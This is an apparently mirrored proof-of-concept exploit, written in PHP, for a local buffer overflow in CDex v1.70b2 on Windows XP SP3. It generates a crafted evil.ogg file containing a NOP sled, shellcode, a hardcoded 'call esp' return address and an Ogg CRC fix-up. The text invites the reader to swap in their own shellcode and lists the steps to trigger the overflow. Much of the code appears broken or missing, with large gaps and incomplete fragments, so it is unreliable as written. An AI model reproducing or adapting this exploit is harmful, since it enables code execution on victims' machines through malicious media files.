
CDex v1.70b2 (.ogg) local buffer overflow exploit poc (win xp sp3)

by Nine:Situations:Group::Pyrokinesis

software site: http://cdexos.sourceforge.net/

our site: http://retrogod.altervista.org/

A very reliable buffer overflow exists in the way cdex process Ogg Vorbis Info



c:\php\php 9sg_cdex_local.php

evil.ogg is created, now navigate:

Main Menu-> Tools -> Media file Player -> Select files -> Browse to a folder ->

-> Open -> Play evil.ogg


$_frgmnt1 =

"OggS".                             //for what I understood ... beginning

"\x00".                             //stream_structure_version

"\x02".                             //header_type_flag

"\x00\x00\x00\x00\x00\x00\x00\x00". //granular_position

"\x66\x07\x00\x00".                 //bitstream_serial_number

"\x00\x00\x00\x00".                 //page_sequence_number

"\x92\xa8\x3b\xd9".                 //CRC_checksum

"\x01".                             //number_page_segments

"\x1e".                             //segments_table





$_frgmnt2 =




"\x00\x00\x00\x00". //set crc to 0, after calculate the real crc












//msg box shellcode saying "hey" ...

//replace with your own, the script recalculates the CRC checksum

$scode =


"\xbb\x7b\x1d\x80\x7c". //LoadLibraryA at 0x7c801d7b in kernel32.dll  xpsp3


"\xbb\x30\xae\x80\x7c". //GetProcAddress at 0x7c80ae30 in kernel32.dll



"\xb8\xfa\xca\x81\x7c". //ExitProcess at 0x7c81cafa in kernel32.dll





$_boom=str_repeat("\x90",2048 - strlen($scode)).$scode.

"\x67\x86\x86\x7c".  //eip -> 0x7C868667      call esp kernel32.dll


"\x83\xec\x7f". // sub esp,07f

"\x83\xec\x7f". //..

"\x83\xec\x7f". //..

"\x83\xec\x7f". //..

"\x83\xec\x7f". //..

"\xff\xd4". //call esp


"\x00\x00\x00\x00";//if replaced with non-zero chars, overwrites seh ... do not 

 - strlen($_boom) - 8);








































































































































































































































































function crcOgg (&$_x)                  



        $polynom=0x04C11DB7; //polynomial generator

        for ($i=0; $i<strlen($_x); $i++)


                $c = ord($_x[$i]);

                for ($j=0; $j<8; $j++)



                        if ($crc&0x80000000) $bit=1;

                        if ($c&0x80) $bit^=1;

                        $c<<=1; $crc<<=1;

                        if ($bit) $crc^=$polynom;



        $_x[22]=chr($crc&0xFF);       $_x[23]=chr(($crc>>8)&0xFF);

      $_x[24]=chr(($crc>>16)&0xFF); $_x[25]=chr(($crc>>24)&0xFF);





































































if (!$fp) {die("cannot create evil.ogg...");}




original url: http://retrogod.altervista.org/9sg_cdex_ogg.html

Reply via email to